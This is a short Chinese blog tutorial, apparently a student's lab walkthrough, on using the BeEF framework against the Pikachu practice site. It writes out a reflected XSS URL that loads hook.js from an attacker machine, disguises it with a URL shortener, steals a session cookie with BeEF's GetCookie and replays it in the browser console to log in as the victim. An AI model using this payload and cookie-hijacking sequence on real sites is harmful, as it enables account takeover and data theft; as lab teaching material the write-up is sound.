✅作者简介:CSDN内容合伙人、信息安全专业在校大学生🏆
🔥系列专栏 :XSS漏洞应用-Beef
📃新人博主 :欢迎点赞收藏关注,会回访!
💬舞台再大,你不上台,永远是个观众。平台再好,你不参与,永远是局外人。能力再大,你不行动,只能看别人成功!没有人会关心你付出过多少努力,撑得累不累,摔得痛不痛,他们只会看你最后站在什么位置,然后羡慕或鄙夷。
apt-get install beef-xss
发现安装不了,但是有提示.
apt-get update
apt-get install beef-xss
beef-xss
标记处的意思是叫你 修改密码(密码输入时不可见.),本身默认的密码和账号分别为 beef 和 beef, 这里我设置的密码是root
账号:beef 密码:是你在上面输入的密码(这里我输入的是:root)
成功进入的页面.
beef-xss
命令概括:
实战一般是内网 或者 公网IP
pikachu地址:192.168.43.51
用户地址:192.168.43.196
攻击机地址: 192.168.43.248
写入的命令:
http://192.168.43.51:3355/vul/xss/xss_reflected_get.php?message=%3Cscript+src%3D%22http%3A%2F%2F192.168.43.248%3A3000%2Fhook.js%22%3E%3C%2Fscript%3E&submit=submit
利用工具生成为短链接:45短网址
https://o4rx.cn/84LAg
https://o4rx.cn/84LAg
自动跳转到下面:
http://127.0.0.1:3000/ui/panel
写入的命令:
靶机访问网站的留言页面:
http://127.0.0.1:3000/ui/panel
命今颜色(Color):
主要模块
在鱼儿上钩之后,可以有如下的功能:
如下所示,需要刷新才能看到,有 键盘记录,鼠标的坐标,鼠标单击 双击 是否聚焦等等!
1、选中靶机,在command面板找到GetCookie命令并执行
2、执行后可以看到已经获取到Cookie了
data: cookie=PHPSESSID=ji79tanduunuhs7vgogcqsjhj4; BEEFHOOK=GOdFhm6ZZh4iO0OXy7I4zOcysj6v5ud3S10hOZeujR8aapRwJaLQHpuDd8YfMapyrnVEP3OMDH5ziRYY
3、Cookie利用。在Kali系统上,打开对应的网址,按下F12进入控制台模块,输入命令如下:
document.cookie="PHPSESSID=ji79tanduunuhs7vgogcqsjhj4; BEEFHOOK=GOdFhm6ZZh4iO0OXy7I4zOcysj6v5ud3S10hOZeujR8aapRwJaLQHpuDd8YfMapyrnVEP3OMDH5ziRYY"刷新,可以看到首页登录了对应的账号。
undefined